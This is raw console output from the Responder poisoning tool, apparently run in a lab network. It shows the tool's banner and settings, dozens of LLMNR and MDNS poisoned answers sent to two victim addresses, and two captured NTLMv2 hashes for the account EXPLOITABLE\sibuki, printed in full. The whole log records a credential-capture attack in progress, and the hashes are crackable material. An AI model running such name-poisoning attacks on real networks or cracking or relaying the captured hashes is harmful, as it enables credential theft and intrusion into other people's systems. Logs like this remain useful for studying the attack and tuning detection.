                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|


 [+]  Poisoners:
    LLMNR                       [ON] 
    NBT-NS                      [ON] 
    MDNS                        [ON] 
    DNS                         [ON] 
    DHCP                        [OFF] 

 [+]  Servers:
    HTTP server                 [ON] 
    HTTPS server                [ON] 
    WPAD proxy                  [ON] 
    Auth proxy                  [OFF] 
    SMB server                  [ON] 
    Kerberos server             [ON] 
    SQL server                  [ON] 
    FTP server                  [ON] 
    IMAP server                 [ON] 
    POP3 server                 [ON] 
    SMTP server                 [ON] 
    DNS server                  [ON] 
    LDAP server                 [ON] 
    MQTT server                 [ON] 
    RDP server                  [ON] 
    DCE-RPC server              [ON] 
    WinRM server                [ON] 
    SNMP server                 [ON] 

 [+]  HTTP Options:
    Always serving EXE          [OFF] 
    Serving EXE                 [OFF] 
    Serving HTML                [OFF] 
    Upstream Proxy              [OFF] 

 [+]  Poisoning Options:
    Analyze Mode                [OFF] 
    Force WPAD auth             [OFF] 
    Force Basic Auth            [OFF] 
    Force LM downgrade          [OFF] 
    Force ESS downgrade         [OFF] 

 [+]  Generic Options:
    Responder NIC               [eth2] 
    Responder IP                [192.168.31.244] 
    Responder IPv6              [fe80::473e:7763:17b:9e2] 
    Challenge set               [random] 
    Don't Respond To Names      ['ISATAP', 'ISATAP.LOCAL'] 
    Don't Respond To MDNS TLD   ['_DOSVC'] 
    TTL for poisoned response   [default] 

 [+]  Current Session Variables:
    Responder Machine Name      [WIN-CRCK5QTIP8P] 
    Responder Domain Name       [GXZO.LOCAL] 
    Responder DCE-RPC Port      [47557] 

 [*]  Version: Responder 3.1.7.0
 [*]  Author: Laurent Gaffie, <lgaffie@secorizon.com>
 [*]  To sponsor Responder: https://paypal.me/PythonResponder
 
[+]  Listening for events...

 [!]  Error starting UDP server on port 137, check permissions or other servers running.
 [!]  Error starting TCP server on port 445, check permissions or other servers running.
 [!]  Error starting TCP server on port 139, check permissions or other servers running.
 [!]  Error starting UDP server on port 53, check permissions or other servers running.
 [!]  Error starting TCP server on port 53, check permissions or other servers running.
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 

 [HTTP]  Sending NTLM authentication request to fe80::3b37:c48a:b1e8:c310

 [WebDAV]  NTLMv2 Client   : [0;33mfe80::3b37:c48a:b1e8:c310 

 [WebDAV]  NTLMv2 Username : [0;33mEXPLOITABLE\sibuki 

 [WebDAV]  NTLMv2 Hash     : sibuki::EXPLOITABLE:a0a416a66ba13825:852314EED94B90C9D50709DBBB063625:0101000000000000845303DF00ACDC01EBD66881B49035780000000002000800470058005A004F0001001E00570049004E002D004300520043004B00350051005400490050003800500004001400470058005A004F002E004C004F00430041004C0003003400570049004E002D004300520043004B0035005100540049005000380050002E00470058005A004F002E004C004F00430041004C0005001400470058005A004F002E004C004F00430041004C000800300030000000000000000000000000200000C067E47A5A9F8FDDE852018166A3163C40D11C9E50F5C32405063CCCA984E6E70A001000000000000000000000000000000000000900340048005400540050002F0064006F006D00610069006E002D006500780070006C006F006900690074002E006C006F00630061006C000000000000000000 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 

 [HTTP]  Sending NTLM authentication request to fe80::3b37:c48a:b1e8:c310

 [WebDAV]  NTLMv2 Client   : [0;33mfe80::3b37:c48a:b1e8:c310 

 [WebDAV]  NTLMv2 Username : [0;33mEXPLOITABLE\sibuki 

 [WebDAV]  NTLMv2 Hash     : sibuki::EXPLOITABLE:81cff35c5b401072:E39CCE3E34BBB0393C1D66345FC11FC4:0101000000000000C5F86EE400ACDC01AF71FFC566E494CB0000000002000800470058005A004F0001001E00570049004E002D004300520043004B00350051005400490050003800500004001400470058005A004F002E004C004F00430041004C0003003400570049004E002D004300520043004B0035005100540049005000380050002E00470058005A004F002E004C004F00430041004C0005001400470058005A004F002E004C004F00430041004C000800300030000000000000000000000000200000C067E47A5A9F8FDDE852018166A3163C40D11C9E50F5C32405063CCCA984E6E70A001000000000000000000000000000000000000900280048005400540050002F0064006F006D00610069006E002D006500780070006C006F006900690074000000000000000000 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit.local 
 [*] [MDNS] Poisoned answer sent to 192.168.31.152  for name domain-exploiit.local 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to fe80::3b37:c48a:b1e8:c310 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
 [*] [LLMNR]  Poisoned answer sent to 192.168.31.152 for name domain-exploiit 
